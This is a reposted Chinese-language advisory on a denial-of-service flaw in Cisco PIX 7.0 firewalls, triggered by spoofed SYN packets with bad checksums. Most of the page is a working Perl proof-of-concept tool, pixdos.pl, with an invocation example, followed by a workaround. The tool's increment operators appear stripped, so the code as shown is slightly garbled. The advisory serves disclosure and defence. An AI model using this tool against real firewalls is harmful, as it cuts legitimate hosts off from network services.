Cisco PIX 7.0欺骗TCP SYN报文拒绝服务漏洞

2008-04-09 04:17:21来源：互联网阅读 ()

Cisco PIX 7.0欺骗TCP SYN报文拒绝服务漏洞

发布日期：2005-11-22
更新日期：2005-11-22

受影响系统：

Cisco PIX Firewall 7.0

描述：

Cisco PIX是一款硬件防火墙解决方案。

Cisco PIX在处理畸形的TCP报文时存在漏洞，远程攻击者可能利用此漏洞对合法源访问进行拒绝服务攻击。

如果通过PIX防火墙发送了有错误校验和的TCP SYN报文的话，PIX就会阻断使用相同源和目标TCP端口及IP地址的新TCP连接，直到30秒后才会允许新的连接。因此攻击者可以发送有错误校验和的特制TCP报文，将源/目标IP和端口设置为合法的主机。一旦PIX防火墙接收了这样的报文，就无法同恶意报文中所指定的凭据建立新的TCP会话，默认时间为30秒，之后会恢复正常运行。

<*来源：Randy Ivener （rivener@cisco.com）
Konstantin V. Gavrilenko （mlists@arhont.com）

链接：http://marc.theaimsgroup.com/?l=full-disclosure&m=113267848631520&w=2
http://marc.theaimsgroup.com/?l=full-disclosure&m=113265911605952&w=2
*>

测试方法：

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

#!/usr/bin/perl
eval ("use Getopt::Long;");die "[error] Getopt::Long perl module is not installed \n" if $@;
eval ("use Net::RawIP;");die "[error] Net::RawIP perl module is not installed \n" if $@;
eval ("use Term::ProgressBar;");die "[error] Term::ProgressBar perl module is not installed \n"

if $@;
my $VERSION = "0.1";
print "$0, $PgmName, V $VERSION \n";
GetOptions (
"help" =>\$usage,
"device=s" => \$device,
"source=s" =>\$sourceip,
"dest=s"=>\$destip,
"sourcemac=s"=>\$sourcemac,
"destmac=s"=>\$destmac,
"port=n"=> \$tcpport,
);

######################## Config option #############################################

my $timeout = "0,1"; # Timeout

if ($usage) {&usage;}

if (!$device) {
$device= 'eth0'; # Network device
}

if (!$destmac) {print "Dest MAC not found \n"; &usage;}
if (!$sourceip) {print "Source IP not found \n"; &usage;}
if (!$destip) {print "Dest IP not found \n"; &usage;}
if (!$tcpport) {print "TCP port not found \n"; &usage;}

my $syn="1"; # TCP SYN SET
my $tcpdata = "TEST"; # TCP payload
my $count=0;

####################################################################################

#Initialize Progres Bar
my $progress = Term::ProgressBar->new(32768);
$progress->minor(0);
$packet = new Net::RawIP;
$packet-> ethnew($device);

if (!$sourcemac) {
$packet -> ethset( dest => $destmac);
}else {
$packet -> ethset( source =>$sourcemac, dest => $destmac);
}

for ($count=0; $count< 65537 ; $count ) {

$packet->set({

ip => {
saddr => $sourceip,
daddr => $destip
},

tcp => {
check => 0x0010 , # TCP Packet Checksum 0 for auto correct
source => $count,
dest => $tcpport,
syn => $syn,
data => $tcpdata
}});
$packet->ethsend($timeout);
#$packet->send($timeout);

$progress->update($_);
$count ;
}

sub usage {
print <<EOF ;
This program was originally written in the due course of writing
"Hacking Exposed Cisco Networks: Cisco Security Secrets and Solutions" book.
Tool author - Janis Vizulis, Arhont Ltd. (License GPL-2 ) Please send bugs
and comments to info@arhont.com

usage: $0 [ --device=interface ] [--source=IP] [--dest=IP] [--sourcemac=MAC]
[--destmac=MAC] [--port=n]

Options:

--help This message
--device Network interface (defaut set eth0)
--source Victim source IP
--dest Victim destination IP
--sourcemac Victim source MAC
--destmac MAC Address of the gateway
--port TCP port

Example: ./pixdos.pl --device eth0 --source 192.168.44.10 --dest 192.168.55.111 \
--sourcemac 00:90:27:99:11:b6 --destmac 00:60:27:99:11:b6 --port 22
EOF

exit shift;
}

建议：

临时解决方法：

* 发布"clear xlate"或"clear local-host <高安全级别接口的ip地址>"命令可允许连接通过防火墙。

标签：

版权申明：本站文章部分自网络，如有侵权，请联系：west999com@outlook.com
特别注意：本站所有转载文章言论不代表本站观点，本站所提供的摄影照片，插画，设计作品，如需使用，请与原作者联系，版权归原作者所有